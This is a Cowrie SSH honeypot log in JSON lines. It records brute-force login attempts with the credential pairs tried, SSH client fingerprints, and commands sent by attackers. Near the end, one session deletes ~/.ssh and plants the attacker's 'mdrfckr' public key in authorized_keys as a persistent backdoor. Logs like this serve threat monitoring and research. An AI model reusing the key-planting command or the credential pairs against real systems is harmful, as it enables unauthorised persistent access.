{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:36.279178Z","src_ip":"212.227.235.229","session":"f9beee28b4d2"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"DiarNisa11077#","message":"login attempt [ansible/DiarNisa11077#] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:37.106705Z","src_ip":"170.64.166.123","session":"ff2aa80abe1b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:37.270915Z","src_ip":"212.227.235.229","session":"a0bc309d039c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58468,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1fae65bb0ee","protocol":"ssh","message":"New connection: 212.227.235.229:58468 (1.2.3.4:22) [session: c1fae65bb0ee]","sensor":"my-vps","timestamp":"2025-08-31T05:53:37.552171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:37.553033Z","src_ip":"212.227.235.229","session":"c1fae65bb0ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:37.837883Z","src_ip":"212.227.235.229","session":"c1fae65bb0ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:38.097521Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:53:38.098229Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:38.382441Z","src_ip":"170.64.166.123","session":"ff2aa80abe1b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.018387Z","src_ip":"212.227.235.229","session":"c1fae65bb0ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.087755Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.session.closed","duration":"22.6","message":"Connection lost after 22.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.103895Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38072,"dst_ip":"1.2.3.4","dst_port":22,"session":"76f5272a674d","protocol":"ssh","message":"New connection: 212.227.235.229:38072 (1.2.3.4:22) [session: 76f5272a674d]","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.172801Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.305171Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:39.306149Z","src_ip":"212.227.235.229","session":"c1fae65bb0ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:53:40.050003Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:53:40.050720Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:45.810064Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58482,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc6d71f9ff7d","protocol":"ssh","message":"New connection: 212.227.125.160:58482 (1.2.3.4:22) [session: bc6d71f9ff7d]","sensor":"my-vps","timestamp":"2025-08-31T05:53:48.952913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:53:49.363900Z","src_ip":"212.227.125.160","session":"bc6d71f9ff7d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:53:49.364559Z","src_ip":"212.227.125.160","session":"bc6d71f9ff7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:50.107655Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:53:50.108386Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.login.failed","username":"test2","password":"welcome","message":"login attempt [test2/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:51.770263Z","src_ip":"212.227.125.160","session":"bc6d71f9ff7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:52.481223Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:52.482598Z","src_ip":"212.227.235.229","session":"76f5272a674d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:53.143440Z","src_ip":"212.227.125.160","session":"bc6d71f9ff7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39928,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6770260ec69","protocol":"ssh","message":"New connection: 212.227.125.160:39928 (1.2.3.4:22) [session: d6770260ec69]","sensor":"my-vps","timestamp":"2025-08-31T05:53:56.215245Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56318,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fba3cfac1e9","protocol":"ssh","message":"New connection: 212.227.235.229:56318 (1.2.3.4:22) [session: 9fba3cfac1e9]","sensor":"my-vps","timestamp":"2025-08-31T05:53:56.854997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:56.857059Z","src_ip":"212.227.235.229","session":"9fba3cfac1e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:57.113527Z","src_ip":"212.227.235.229","session":"9fba3cfac1e9"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"rocky","message":"login attempt [rocky/rocky] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:58.139280Z","src_ip":"212.227.235.229","session":"9fba3cfac1e9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:59.398821Z","src_ip":"212.227.235.229","session":"9fba3cfac1e9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:54:00.168407Z","src_ip":"212.227.125.160","session":"d6770260ec69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:54:00.169066Z","src_ip":"212.227.125.160","session":"d6770260ec69"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:13.955579Z","src_ip":"212.227.125.160","session":"d6770260ec69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54974,"dst_ip":"1.2.3.4","dst_port":22,"session":"a04db894c470","protocol":"ssh","message":"New connection: 212.227.235.229:54974 (1.2.3.4:22) [session: a04db894c470]","sensor":"my-vps","timestamp":"2025-08-31T05:54:16.006464Z"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:17.052764Z","src_ip":"212.227.125.160","session":"d6770260ec69"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:54:18.292953Z","src_ip":"212.227.235.229","session":"a04db894c470"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:54:18.293904Z","src_ip":"212.227.235.229","session":"a04db894c470"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":32852,"dst_ip":"1.2.3.4","dst_port":22,"session":"afd3ccc0641a","protocol":"ssh","message":"New connection: 43.159.36.188:32852 (1.2.3.4:22) [session: afd3ccc0641a]","sensor":"my-vps","timestamp":"2025-08-31T05:54:23.819762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:23.820773Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:24.080953Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.login.success","username":"root","password":"special","message":"login attempt [root/special] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:54:25.162826Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46922,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b3905786d35","protocol":"ssh","message":"New connection: 212.227.235.229:46922 (1.2.3.4:22) [session: 1b3905786d35]","sensor":"my-vps","timestamp":"2025-08-31T05:54:25.454904Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:25.697598Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:25.698295Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:25.699171Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:25.960088Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:54:26.167922Z","src_ip":"212.227.235.229","session":"1b3905786d35"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:54:26.168629Z","src_ip":"212.227.235.229","session":"1b3905786d35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:26.538359Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:54:26.539246Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:54:26.801405Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
